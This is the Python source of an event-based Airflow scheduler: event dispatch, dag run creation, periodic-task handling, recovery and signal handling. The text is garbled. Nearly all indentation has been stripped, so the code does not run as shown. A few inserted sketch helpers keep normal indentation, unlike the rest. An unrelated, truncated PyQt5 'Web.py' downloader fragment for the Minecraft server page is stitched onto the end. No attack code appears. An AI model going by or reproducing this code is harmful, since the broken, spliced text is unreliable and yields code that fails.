# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import sched
import signal
import sys
import threading
import time
import traceback
from typing import Callable, List, Optional
from airflow.contrib.jobs.periodic_manager import PeriodicManager
from airflow.events.context_extractor import ContextExtractor, EventContext
from airflow.exceptions import SerializedDagNotFound, AirflowException
from airflow.models.dagcode import DagCode
from airflow.models.event_progress import get_event_progress, create_or_update_progress
from airflow.models.message import IdentifiedMessage, MessageState
from sqlalchemy import func, not_, or_, asc, case
from sqlalchemy.orm import selectinload
from sqlalchemy.orm.session import Session
from airflow import models, settings
from airflow.configuration import conf
from airflow.executors.base_executor import BaseExecutor
from airflow.jobs.base_job import BaseJob
from airflow.models import DagModel, BaseOperator
from airflow.models.dag import DagEventDependencies, DAG
from airflow.models.dagbag import DagBag
from airflow.models.dagrun import DagRun
from airflow.models.eventhandler import EventKey
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import TaskInstanceKey
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.session import create_session, provide_session
from airflow.utils.sqlalchemy import prohibit_commit, skip_locked, with_row_locks
from airflow.utils.state import State
from airflow.utils.types import DagRunType
from airflow.utils.mailbox import Mailbox
from airflow.events.scheduler_events import (
StopSchedulerEvent, TaskSchedulingEvent, DagExecutableEvent, TaskStateChangedEvent, EventHandleEvent, RequestEvent,
ResponseEvent, StopDagEvent, ParseDagRequestEvent, ParseDagResponseEvent, SchedulerInnerEventUtil,
BaseUserDefineMessage, UserDefineMessageType, SCHEDULER_NAMESPACE, DagRunFinishedEvent, PeriodicEvent,
DagRunCreatedEvent, Status)
from notification_service.base_notification import BaseEvent
from notification_service.client import EventWatcher, NotificationClient
from airflow.contrib.jobs.dag_trigger import DagTrigger
from airflow.contrib.jobs.dagrun_event_manager import DagRunEventManager, DagRunId
from airflow.executors.scheduling_action import SchedulingAction
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
MSG = models.Message
class EventBasedScheduler(LoggingMixin):
def __init__(self, id,
mailbox: Mailbox,
task_event_manager: DagRunEventManager,
executor: BaseExecutor,
notification_client: NotificationClient,
notification_server_uri: str,
context=None,
periodic_manager: PeriodicManager = None):
super().__init__(context)
self.id = id
self.mailbox = mailbox
self.task_event_manager: DagRunEventManager = task_event_manager
self.executor = executor
self.notification_client = notification_client
self.dagbag = DagBag(read_dags_from_db=True)
self._timer_handler = None
self.timers = sched.scheduler()
self.periodic_manager = periodic_manager
self.notification_server_uri = notification_server_uri
def sync(self):
def call_regular_interval(
delay: float,
action: Callable,
arguments=(),
kwargs={},
): # pylint: disable=dangerous-default-value
def repeat(*args, **kwargs):
action(*args, **kwargs)
# This is not perfect. If we want a timer every 60s, but action
# takes 10s to run, this will run it every 70s.
# Good enough for now
self._timer_handler = self.timers.enter(delay, 1, repeat, args, kwargs)
self._timer_handler = self.timers.enter(delay, 1, repeat, arguments, kwargs)
call_regular_interval(
delay=conf.getfloat('scheduler', 'scheduler_heartbeat_sec', fallback='5.0'),
action=self.executor.sync
)
self.timers.run()
def stop_timer(self):
if self.timers and self._timer_handler:
self.timers.cancel(self._timer_handler)
def submit_sync_thread(self):
threading.Thread(target=self.sync).start()
def schedule(self) -> bool:
identified_message = self.mailbox.get_identified_message()
if not identified_message:
return True
origin_event = identified_message.deserialize()
self.log.debug("Event: {}".format(origin_event))
if SchedulerInnerEventUtil.is_inner_event(origin_event):
event = SchedulerInnerEventUtil.to_inner_event(origin_event)
else:
event = origin_event
with create_session() as session:
if isinstance(event, BaseEvent):
dagruns = self._find_dagruns_by_event(event, session)
for dagrun in dagruns:
dag_run_id = DagRunId(dagrun.dag_id, dagrun.run_id)
self.task_event_manager.handle_event(dag_run_id, event)
elif isinstance(event, RequestEvent):
self._process_request_event(event)
elif isinstance(event, TaskSchedulingEvent):
is_schedulable = self._task_is_schedulable(dag_id=event.dag_id,
task_id=event.task_id,
execution_date=event.execution_date,
session=session)
if is_schedulable:
self._schedule_task(event)
else:
self.log.info("dag_id: {} task_id: {} execution_date: {} is not schedulable."
.format(event.dag_id, event.task_id, event.execution_date))
elif isinstance(event, TaskStateChangedEvent):
dagrun = self._find_dagrun(event.dag_id, event.execution_date, session)
if dagrun is not None:
self._handle_task_status_changed(dagrun, event, session)
dag_run_id = DagRunId(dagrun.dag_id, dagrun.run_id)
self.task_event_manager.handle_event(dag_run_id, origin_event)
tasks = self._find_downstream_tasks(event.task_id, dagrun, session)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
if dagrun.state in State.finished:
self.mailbox.send_message(DagRunFinishedEvent(dagrun.dag_id, dagrun.execution_date).to_event())
else:
self.log.warning("dagrun is None for dag_id:{} execution_date: {}".format(event.dag_id,
event.execution_date))
elif isinstance(event, DagRunCreatedEvent):
dagrun = self._find_dagrun(event.dag_id, event.execution_date, session)
if dagrun is not None:
tasks = self._find_scheduled_tasks(dagrun, session)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
else:
self.log.warning("dagrun is None for dag_id:{} execution_date: {}".format(
event.dag_id, event.execution_date))
elif isinstance(event, DagExecutableEvent):
if DagModel.dag_needing_dagruns(session, event.dag_id):
dagrun = self._create_dag_run(event.dag_id, session=session)
tasks = self._find_scheduled_tasks(dagrun, session)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
elif isinstance(event, EventHandleEvent):
dag_runs = DagRun.find(dag_id=event.dag_id, run_id=event.dag_run_id)
if len(dag_runs) < 1:
self.log.warning("DagRun not found by dag_id:{}, run_id:{}".format(
event.dag_id, event.dag_run_id))
else:
ti = dag_runs[0].get_task_instance(event.task_id)
self._send_scheduling_task_event(ti, event.action)
elif isinstance(event, StopDagEvent):
self._stop_dag(event.dag_id, session)
elif isinstance(event, DagRunFinishedEvent):
self._stop_scheduling_periodic_tasks(event.dag_id, event.execution_date)
elif isinstance(event, PeriodicEvent):
dag_runs = DagRun.find(dag_id=event.dag_id, execution_date=event.execution_date)
if len(dag_runs) < 1:
self.log.warning("DagRun not found by dag_id:{}, execution_date:{}".format(
event.dag_id, event.execution_date))
else:
dag_run = dag_runs[0]
if dag_run.get_state() == State.RUNNING:
ti = dag_runs[0].get_task_instance(event.task_id)
self._send_scheduling_task_event(ti, SchedulingAction.RESTART)
else:
self.periodic_manager.remove_task(dag_id=event.dag_id,
execution_date=event.execution_date,
task_id=event.task_id)
self.log.info("Dag run's state is not running(dag_id:{} execution_date: {}), "
"so stop periodic scheduling task(id: {})".format(event.dag_id,
str(event.execution_date),
event.task_id))
elif isinstance(event, StopSchedulerEvent):
self.log.info("{} {}".format(self.id, event.job_id))
if self.id == event.job_id or 0 == event.job_id:
self.log.info("break the scheduler event loop.")
identified_message.remove_handled_message()
session.expunge_all()
return False
elif isinstance(event, ParseDagRequestEvent) or isinstance(event, ParseDagResponseEvent):
pass
elif isinstance(event, ResponseEvent):
pass
else:
self.log.error("can not handle the event {}".format(event))
identified_message.remove_handled_message()
session.expunge_all()
return True
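# Illustrative summary of the dispatch above (derived from the code, not a
# spec): BaseEvent -> forwarded to the matching running dag runs;
# RequestEvent -> _process_request_event; TaskSchedulingEvent -> schedule the
# task if it is still schedulable; TaskStateChangedEvent -> update state and
# start downstream tasks; DagRunCreatedEvent / DagExecutableEvent -> kick off
# newly runnable tasks (creating a dag run first for DagExecutableEvent);
# EventHandleEvent / PeriodicEvent -> (re)schedule a single task instance;
# StopDagEvent / DagRunFinishedEvent -> stop the dag or its periodic tasks;
# StopSchedulerEvent -> break the scheduler event loop.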
def _handle_task_status_changed(self, dagrun: DagRun, event: TaskStateChangedEvent, session):
ti = dagrun.get_task_instance(task_id=event.task_id)
if event.try_number == ti.try_number:
if State.UP_FOR_RETRY == event.state:
dag = self.dagbag.get_dag(dagrun.dag_id, session=session)
ti.task = dag.get_task(ti.task_id)
next_retry_datetime = ti.next_retry_datetime()
self.mailbox.send_message(message=TaskSchedulingEvent(dag_id=event.dag_id,
task_id=event.task_id,
execution_date=event.execution_date,
try_number=event.try_number,
action=SchedulingAction.START).to_event(),
queue_time=next_retry_datetime)
ti.update_latest_task_execution(session=session)
def stop(self) -> None:
self.mailbox.send_message(StopSchedulerEvent(self.id).to_event())
self.log.info("Send stop event to the scheduler.")
def recover(self, last_scheduling_id):
lost_dag_codes = DagCode.recover_lost_dag_code()
self.log.info("Found %s dags not exists in DAG folder, recovered from DB. Dags' path: %s",
len(lost_dag_codes), lost_dag_codes)
self.log.info("Waiting for executor recovery...")
self.executor.recover_state()
unprocessed_messages = self.get_unprocessed_message(last_scheduling_id)
self.log.info("Recovering %s messages of last scheduler job with id: %s",
len(unprocessed_messages), last_scheduling_id)
for msg in unprocessed_messages:
self.mailbox.send_message(msg.deserialize(), msg.queue_time)
@staticmethod
def get_unprocessed_message(last_scheduling_id: int) -> List[IdentifiedMessage]:
with create_session() as session:
results: List[MSG] = session.query(MSG).filter(
MSG.scheduling_job_id == last_scheduling_id,
MSG.state == MessageState.QUEUED
).order_by(asc(MSG.id)).all()
unprocessed: List[IdentifiedMessage] = []
for msg in results:
unprocessed.append(IdentifiedMessage(msg.data, msg.id, msg.queue_time))
return unprocessed
def _find_dagrun(self, dag_id, execution_date, session) -> DagRun:
dagrun = session.query(DagRun).filter(
DagRun.dag_id == dag_id,
DagRun.execution_date == execution_date
).first()
return dagrun
def _register_periodic_events(self, execution_date, dag, session=None):
self.periodic_manager.store.set_session(session)
for task in dag.tasks:
if task.executor_config is not None and 'periodic_config' in task.executor_config:
self.log.debug('register periodic task {} {} {}'.format(dag.dag_id, execution_date, task.task_id))
self.periodic_manager.add_task(dag_id=dag.dag_id,
execution_date=execution_date,
task_id=task.task_id,
periodic_config=task.executor_config['periodic_config'])
self.periodic_manager.store.unset_session()
@provide_session
def _stop_scheduling_periodic_tasks(self, dag_id, execution_date, session=None):
dagruns = DagRun.find(dag_id=dag_id, execution_date=execution_date)
if not dagruns:
self.log.warning(f'Found no dagruns to remove periodic events for with dag_id: {dag_id} '
f'and execution_date: {execution_date}.')
else:
dag = self.dagbag.get_dag(dag_id=dagruns[0].dag_id, session=session)
for task in dag.tasks:
if task.executor_config is not None and 'periodic_config' in task.executor_config:
self.log.debug('remove periodic task {} {} {}'.format(dag_id, execution_date, task.task_id))
self.periodic_manager.remove_task(dag_id, execution_date, task.task_id)
def _create_dag_run(self, dag_id, session, run_type=DagRunType.SCHEDULED, context=None) -> DagRun:
with prohibit_commit(session) as guard:
if settings.USE_JOB_SCHEDULE:
"""
Unconditionally create a DAG run for the given DAG, and update the dag_model's fields to control
if/when the next DAGRun should be created
"""
try:
dag = self.dagbag.get_dag(dag_id, session=session)
dag_model = session \
.query(DagModel).filter(DagModel.dag_id == dag_id).first()
if dag_model is None:
return None
next_dagrun = dag_model.next_dagrun
dag_hash = self.dagbag.dags_hash.get(dag.dag_id)
external_trigger = False
# register periodic task
if run_type == DagRunType.MANUAL:
next_dagrun = timezone.utcnow()
external_trigger = True
# Explicitly check if the DagRun already exists. This is an edge case
# where a Dag Run is created but `DagModel.next_dagrun` and `DagModel.next_dagrun_create_after`
# are not updated.
active_dagrun = session.query(DagRun) \
.filter(DagRun.dag_id == dag_model.dag_id,
DagRun.execution_date == dag_model.next_dagrun).first()
if active_dagrun is not None:
self.log.info("Dagrun already created, %s", active_dagrun)
return active_dagrun
dag_run = dag.create_dagrun(
run_type=run_type,
execution_date=next_dagrun,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=external_trigger,
session=session,
dag_hash=dag_hash,
creating_job_id=self.id,
context=context
)
if run_type == DagRunType.SCHEDULED:
self._update_dag_next_dagrun(dag_id, session)
self._register_periodic_events(dag_run.execution_date, dag, session)
# commit the session - Release the write lock on DagModel table.
guard.commit()
# END: create dagrun
return dag_run
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_id)
return None
except Exception:
self.log.exception("Error occurred when create dag_run of dag: %s", dag_id)
return None
def _update_dag_next_dagrun(self, dag_id, session):
"""
Bulk update the next_dagrun and next_dagrun_create_after for all the dags.
We batch the select queries to get info about all the dags at once
"""
active_runs_of_dag = session \
.query(func.count('*')).filter(
DagRun.dag_id == dag_id,
DagRun.state == State.RUNNING,
DagRun.external_trigger.is_(False),
).scalar()
dag_model = session \
.query(DagModel).filter(DagModel.dag_id == dag_id).first()
dag = self.dagbag.get_dag(dag_id, session=session)
if dag.max_active_runs and active_runs_of_dag >= dag.max_active_runs:
self.log.info(
"DAG %s is at (or above) max_active_runs (%d of %d), not creating any more runs",
dag.dag_id,
active_runs_of_dag,
dag.max_active_runs,
)
dag_model.next_dagrun_create_after = None
else:
dag_model.next_dagrun, dag_model.next_dagrun_create_after = dag.next_dagrun_info(
dag_model.next_dagrun
)
@staticmethod
def _task_is_schedulable(dag_id, task_id, execution_date, session) -> bool:
task_instance = session.query(TI).filter(TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date).first()
if task_instance is None or task_instance.is_schedulable is False:
return False
else:
return True
def _schedule_task(self, scheduling_event: TaskSchedulingEvent):
task_key = TaskInstanceKey(
scheduling_event.dag_id,
scheduling_event.task_id,
scheduling_event.execution_date,
scheduling_event.try_number
)
self.executor.schedule_task(task_key, scheduling_event.action)
def _find_dagruns_by_event(self, event, session) -> Optional[List[DagRun]]:
affect_dag_runs = []
event_key = EventKey(event.key, event.event_type, event.namespace, event.sender)
dag_runs = session \
.query(DagRun).filter(DagRun.state == State.RUNNING).all()
self.log.debug('dag_runs {}'.format(len(dag_runs)))
if dag_runs is None or len(dag_runs) == 0:
return affect_dag_runs
dags = session.query(SerializedDagModel).filter(
SerializedDagModel.dag_id.in_(dag_run.dag_id for dag_run in dag_runs)
).all()
self.log.debug('dags {}'.format(len(dags)))
affect_dags = {}
for dag in dags:
self.log.debug('dag config {}'.format(dag.event_relationships))
self.log.debug('event key {} {} {}'.format(event.key, event.event_type, event.namespace))
dep: DagEventDependencies = DagEventDependencies.from_json(dag.event_relationships)
if dep.is_affect(event_key):
context_extractor: ContextExtractor = dag.context_extractor
try:
event_context: EventContext = context_extractor.extract_context(event)
except Exception as e:
self.log.error(
"Failed to call context extractor, dag {} skips event {}".format(dag.dag_id, event),
exc_info=e)
continue
if event_context is not None:
affect_dags[dag.dag_id] = event_context
if len(affect_dags) == 0:
return affect_dag_runs
for dag_run in dag_runs:
if dag_run.dag_id in affect_dags:
event_context: EventContext = affect_dags[dag_run.dag_id]
if event_context.is_broadcast() or dag_run.context in event_context.get_contexts():
affect_dag_runs.append(dag_run)
return affect_dag_runs
def _find_scheduled_tasks(
self,
dag_run: DagRun,
session: Session,
check_execution_date=False
) -> Optional[List[TI]]:
"""
Make scheduling decisions about an individual dag run
``currently_active_runs`` is passed in so that a batch query can be
used to ask this for all dag runs in the batch, to avoid an n+1 query.
:param dag_run: The DagRun to schedule
:return: scheduled tasks
"""
if not dag_run or dag_run.get_state() in State.finished:
return
try:
dag = dag_run.dag = self.dagbag.get_dag(dag_run.dag_id, session=session)
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_run.dag_id)
return None
if not dag:
self.log.error("Couldn't find dag %s in DagBag/DB!", dag_run.dag_id)
return None
currently_active_runs = session.query(
TI.execution_date,
).filter(
TI.dag_id == dag_run.dag_id,
TI.state.notin_(list(State.finished)),
).distinct().all()
if check_execution_date and dag_run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.warning("Execution date is in future: %s", dag_run.execution_date)
return None
if dag.max_active_runs and not dag.is_long_running_dag():
if (
len(currently_active_runs) >= dag.max_active_runs
and dag_run.execution_date not in currently_active_runs
):
self.log.warning(
"DAG %s already has %d active runs, not queuing any tasks for run %s",
dag.dag_id,
len(currently_active_runs),
dag_run.execution_date,
)
self._verify_integrity_if_dag_changed(dag_run=dag_run, session=session)
schedulable_tis, callback_to_run = dag_run.update_state(session=session, execute_callbacks=False)
dag_run.schedule_tis(schedulable_tis, session)
session.commit()
query = (session.query(TI)
.outerjoin(TI.dag_run)
.filter(DR.run_id == dag_run.run_id)
.join(TI.dag_model)
.filter(not_(DM.is_paused))
.filter(TI.state == State.SCHEDULED)
.options(selectinload('dag_model')))
scheduled_tis: List[TI] = with_row_locks(
query,
of=TI,
**skip_locked(session=session),
).all()
return scheduled_tis
def _find_downstream_tasks(self, task_id, dag_run, session) -> Optional[List[TI]]:
tasks = self._find_scheduled_tasks(dag_run, session)
if not tasks or len(tasks) == 0:
return None
dag = self.dagbag.get_dag(dag_run.dag_id, session=session)
downstream_task_ids = dag.task_dict.get(task_id).downstream_task_ids
res = []
for task in tasks:
if task.task_id in downstream_task_ids:
res.append(task)
return res
@provide_session
def _verify_integrity_if_dag_changed(self, dag_run: DagRun, session=None):
"""Only run DagRun.verify integrity if Serialized DAG has changed since it is slow"""
latest_version = SerializedDagModel.get_latest_version_hash(dag_run.dag_id, session=session)
if dag_run.dag_hash == latest_version:
self.log.debug("DAG %s not changed structure, skipping dagrun.verify_integrity", dag_run.dag_id)
return
dag_run.dag_hash = latest_version
# Refresh the DAG
dag_run.dag = self.dagbag.get_dag(dag_id=dag_run.dag_id, session=session)
# Verify integrity also takes care of session.flush
dag_run.verify_integrity(session=session)
def _send_scheduling_task_event(self, ti: Optional[TI], action: SchedulingAction):
if ti is None or action == SchedulingAction.NONE:
return
with create_session() as session:
ti.state = State.QUEUED
session.commit()
task_scheduling_event = TaskSchedulingEvent(
ti.task_id,
ti.dag_id,
ti.execution_date,
ti.try_number,
action
)
self.mailbox.send_message(task_scheduling_event.to_event())
def _send_scheduling_task_events(self, tis: Optional[List[TI]], action: SchedulingAction):
if tis is None:
return
for ti in tis:
self._send_scheduling_task_event(ti, action)
@provide_session
def _emit_pool_metrics(self, session: Session = None) -> None:
pools = models.Pool.slots_stats(session=session)
for pool_name, slot_stats in pools.items():
Stats.gauge(f'pool.open_slots.{pool_name}', slot_stats["open"])
Stats.gauge(f'pool.queued_slots.{pool_name}', slot_stats[State.QUEUED])
Stats.gauge(f'pool.running_slots.{pool_name}', slot_stats[State.RUNNING])
@staticmethod
def _reset_unfinished_task_state(dag_run):
with create_session() as session:
to_be_reset = [s for s in State.unfinished if s not in [State.RUNNING, State.QUEUED]]
tis = dag_run.get_task_instances(to_be_reset, session)
for ti in tis:
ti.state = State.NONE
session.commit()
@provide_session
def restore_unfinished_dag_run(self, session):
dag_runs = DagRun.next_dagruns_to_examine(session, max_number=sys.maxsize).all()
if not dag_runs or len(dag_runs) == 0:
return
for dag_run in dag_runs:
self._reset_unfinished_task_state(dag_run)
tasks = self._find_scheduled_tasks(dag_run, session)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
@provide_session
def heartbeat_callback(self, session: Session = None) -> None:
Stats.incr('scheduler_heartbeat', 1, 1)
@provide_session
def _process_request_event(self, event: RequestEvent, session: Session = None):
try:
message = BaseUserDefineMessage()
message.from_json(event.body)
if message.message_type == UserDefineMessageType.RUN_DAG:
# todo make sure dag file is parsed.
dagrun = self._create_dag_run(message.dag_id, session=session, run_type=DagRunType.MANUAL,
context=message.context)
if not dagrun:
self.log.error("Failed to create dag_run.")
                    # TODO Need to add ret_code and error_msg in ExecutionContext in case of exception
self.notification_client.send_event(ResponseEvent(event.request_id, None).to_event())
return
tasks = self._find_scheduled_tasks(dagrun, session, False)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
self.notification_client.send_event(ResponseEvent(event.request_id, dagrun.run_id).to_event())
elif message.message_type == UserDefineMessageType.STOP_DAG_RUN:
dag_run = DagRun.get_run_by_id(session=session, dag_id=message.dag_id, run_id=message.dagrun_id)
self._stop_dag_run(dag_run)
self.notification_client.send_event(ResponseEvent(event.request_id, dag_run.run_id).to_event())
elif message.message_type == UserDefineMessageType.EXECUTE_TASK:
dagrun = DagRun.get_run_by_id(session=session, dag_id=message.dag_id, run_id=message.dagrun_id)
ti: TI = dagrun.get_task_instance(task_id=message.task_id)
self.mailbox.send_message(TaskSchedulingEvent(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=ti.execution_date,
try_number=ti.try_number,
action=SchedulingAction(message.action)
).to_event())
self.notification_client.send_event(ResponseEvent(event.request_id, dagrun.run_id).to_event())
elif message.message_type == UserDefineMessageType.STOP_SCHEDULING_TASK:
self._process_scheduling_job_request(event, message, False, session)
elif message.message_type == UserDefineMessageType.RESUME_SCHEDULING_TASK:
self._process_scheduling_job_request(event, message, True, session)
except Exception as e:
self.log.exception("Error occurred when processing request event.")
self.notification_client.send_event(ResponseEvent(event.request_id, str(e), Status.ERROR).to_event())
def _process_scheduling_job_request(self, event, message, is_schedulable, session):
dagrun = DagRun.get_run_by_id(session=session, dag_id=message.dag_id, run_id=message.dagrun_id)
ti: TI = dagrun.get_task_instance(task_id=message.task_id)
ti.is_schedulable = is_schedulable
session.merge(ti)
session.commit()
self.notification_client.send_event(ResponseEvent(event.request_id, ti.task_id).to_event())
def _stop_dag(self, dag_id, session: Session):
"""
Stop the dag. Pause the dag and cancel all running dag_runs and task_instances.
"""
DagModel.get_dagmodel(dag_id, session) \
.set_is_paused(is_paused=True, including_subdags=True, session=session)
active_runs = DagRun.find(dag_id=dag_id, state=State.RUNNING)
for dag_run in active_runs:
self._stop_dag_run(dag_run)
def _stop_dag_run(self, dag_run: DagRun):
dag_run.stop_dag_run()
self._stop_scheduling_periodic_tasks(dag_id=dag_run.dag_id, execution_date=dag_run.execution_date)
for ti in dag_run.get_task_instances():
if ti.state in State.unfinished:
self.executor.schedule_task(ti.key, SchedulingAction.STOP)
self.mailbox.send_message(DagRunFinishedEvent(dag_id=dag_run.dag_id,
execution_date=dag_run.execution_date).to_event())
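# Illustrative sketch (not part of the scheduler classes): the gating rule applied by
# _update_dag_next_dagrun above, reduced to a pure function. The parameter names are
# assumptions for this example only; the real method reads the run counts from the DagRun
# table and delegates the date computation to DAG.next_dagrun_info().
def _sketch_next_dagrun_gate(active_runs, max_active_runs, current_next_dagrun, next_run_info):
    """Return the (next_dagrun, next_dagrun_create_after) pair to store on the DagModel."""
    if max_active_runs and active_runs >= max_active_runs:
        # at or above the limit: keep next_dagrun as-is and pause creation of further runs
        return current_next_dagrun, None
    # below the limit: advance to the values computed by DAG.next_dagrun_info()
    return next_run_info
# Example (hypothetical values): 3 active runs of 3 allowed pauses run creation:
#   _sketch_next_dagrun_gate(3, 3, some_date, (later_date, create_after)) -> (some_date, None)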
class SchedulerEventWatcher(EventWatcher):
def __init__(self, mailbox):
self.mailbox = mailbox
def process(self, events: List[BaseEvent]):
for e in events:
self.mailbox.send_message(e)
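# Minimal usage sketch for the watcher above (assumptions only): _SketchMailbox is a
# stand-in for the real Mailbox class, showing the forwarding contract the scheduler
# relies on - every notification event received by the watcher ends up as a message
# that the scheduling loop can consume.
import queue as _sketch_queue
class _SketchMailbox:
    def __init__(self):
        self._messages = _sketch_queue.Queue()
    def send_message(self, message):
        # the real Mailbox also tags messages with the scheduling job id
        self._messages.put(message)
    def get_message(self, timeout=1):
        return self._messages.get(timeout=timeout)
# Usage sketch:
#   mailbox = _SketchMailbox()
#   SchedulerEventWatcher(mailbox).process([some_event])
#   message = mailbox.get_message()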
class EventBasedSchedulerJob(BaseJob):
"""
1. todo self heartbeat
"""
__mapper_args__ = {'polymorphic_identity': 'EventBasedSchedulerJob'}
def __init__(self, dag_directory,
notification_server_uri=None,
event_start_time=None,
max_runs=-1,
refresh_dag_dir_interval=conf.getint('scheduler', 'refresh_dag_dir_interval', fallback=1),
*args, **kwargs):
super().__init__(*args, **kwargs)
if notification_server_uri is None:
notification_server_uri = conf.get('scheduler', 'notification_server_uri', fallback='127.0.0.1:50052')
self.log.info("Starting event based scheduler with notification server uri: {} dag dir: {}"
.format(notification_server_uri, dag_directory))
self.mailbox: Mailbox = Mailbox()
self.dag_trigger: DagTrigger = DagTrigger(
dag_directory=dag_directory,
max_runs=max_runs,
dag_ids=None,
pickle_dags=False,
mailbox=self.mailbox,
refresh_dag_dir_interval=refresh_dag_dir_interval,
notification_server_uri=notification_server_uri
)
self.task_event_manager = DagRunEventManager(self.mailbox)
self.executor.set_mailbox(self.mailbox)
self.executor.set_notification_server_uri(notification_server_uri)
self.notification_client: NotificationClient = NotificationClient(server_uri=notification_server_uri,
default_namespace=SCHEDULER_NAMESPACE)
self.periodic_manager = PeriodicManager(self.mailbox)
self.scheduler: EventBasedScheduler = EventBasedScheduler(
self.id,
self.mailbox,
self.task_event_manager,
self.executor,
self.notification_client,
notification_server_uri,
None,
self.periodic_manager
)
self.last_scheduling_id = self._last_scheduler_job_id()
self.need_recover_state = False
self.last_event_version = None
if event_start_time is None:
if self.last_scheduling_id is None:
self.start_time = int(time.time() * 1000)
else:
# need recover the state of the scheduler
self.start_time, self.last_event_version = self._get_progress(self.last_scheduling_id)
self.need_recover_state = True
else:
self.start_time = event_start_time
self.log.info('Progress {} {}'.format(self.start_time, self.last_event_version))
@staticmethod
def _last_scheduler_job_id():
last_run = EventBasedSchedulerJob.most_recent_job()
if not last_run:
return None
else:
return last_run.id
@staticmethod
def _get_progress(scheduling_job_id):
progress = get_event_progress(scheduling_job_id)
if progress is None:
return int(time.time() * 1000), None
else:
return progress.last_event_time, progress.last_event_version
def _execute(self):
# faulthandler.enable()
self.log.info("Starting the scheduler Job")
# DAGs can be pickled for easier remote execution by some executors
# pickle_dags = self.do_pickle and self.executor_class not in UNPICKLEABLE_EXECUTORS
try:
self.mailbox.set_scheduling_job_id(self.id)
self.mailbox.start()
self.scheduler.id = self.id
self.dag_trigger.start()
self.task_event_manager.start()
self.executor.job_id = self.id
self.periodic_manager.start()
self.register_signals()
# Start after resetting orphaned tasks to avoid stressing out DB.
execute_start_time = timezone.utcnow()
self.scheduler.submit_sync_thread()
if self.need_recover_state:
self.scheduler.recover(self.last_scheduling_id)
self._set_event_progress()
self._start_listen_events()
self.executor.start()
self._run_scheduler_loop()
self._stop_listen_events()
self.periodic_manager.shutdown()
self.dag_trigger.end()
self.task_event_manager.end()
self.executor.end()
self.mailbox.stop()
settings.Session.remove() # type: ignore
except Exception as e: # pylint: disable=broad-except
self.log.exception("Exception when executing scheduler, %s", e)
finally:
self.log.info("Exited execute loop")
def _run_scheduler_loop(self) -> None:
self.log.info("Starting the scheduler loop.")
self.scheduler.restore_unfinished_dag_run()
should_continue = True
while should_continue:
try:
should_continue = self.scheduler.schedule()
self.heartbeat(only_if_necessary=True)
except Exception as e:
traceback.print_exc()
self.log.error('Scheduler error [%s]', traceback.format_exc())
time.sleep(1)
self.scheduler.stop_timer()
def _set_event_progress(self):
create_or_update_progress(scheduling_job_id=self.id,
last_event_time=self.start_time,
last_event_version=self.last_event_version)
def _start_listen_events(self):
watcher = SchedulerEventWatcher(self.mailbox)
self.notification_client.start_listen_events(
watcher=watcher,
start_time=self.start_time,
version=self.last_event_version
)
self.log.info("start listen event from time: {} version: {}".format(self.start_time, self.last_event_version))
def _stop_listen_events(self):
self.notification_client.stop_listen_events()
def register_signals(self) -> None:
"""Register signals that stop child processes"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
signal.signal(signal.SIGUSR2, self._debug_dump)
def _exit_gracefully(self, signum, frame) -> None: # pylint: disable=unused-argument
"""Helper method to clean up processor_agent to avoid leaving orphan processes."""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
sys.exit(os.EX_OK)
def _debug_dump(self, signum, frame): # pylint: disable=unused-argument
try:
sig_name = signal.Signals(signum).name # pylint: disable=no-member
except Exception: # pylint: disable=broad-except
sig_name = str(signum)
self.log.info("%s\n%s received, printing debug\n%s", "-" * 80, sig_name, "-" * 80)
self.executor.debug_dump()
self.log.info("-" * 80)
def is_alive(self, grace_multiplier: Optional[float] = None) -> bool:
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold: int = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING
and (timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
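# Illustrative sketch of the liveness rule used by is_alive() above, as a pure function.
# The inputs are assumptions for this example; the real method reads the job state and
# latest_heartbeat from the job record and the threshold from the
# scheduler_health_check_threshold config option.
import datetime as _sketch_dt
def _sketch_is_alive(state, latest_heartbeat, threshold_seconds, now=None):
    now = now or _sketch_dt.datetime.now(_sketch_dt.timezone.utc)
    return state == State.RUNNING and (now - latest_heartbeat).total_seconds() < threshold_seconds
# Example: a heartbeat 10 seconds old with a 30 second threshold counts as alive.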
|
Web.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import PyQt5
from PyQt5 import QtCore
from PyQt5.QtCore import QUrl
from PyQt5.QtWebEngineWidgets import QWebEngineView
import PyQt5.QtWidgets
import sys
import os
import urllib.request
#import threading
class Downloader(PyQt5.QtWidgets.QWidget):
    def __init__(self) -> None:
super().__init__()
self.browser()
def browser(self):
URL = 'https://www.minecraft.net/ja-jp/download/server/'
PyQt5.QtWebEngineWidgets.QWebEngineProfile.defaultProfile().downloadRequested.connect(
self.on_downloadRequested
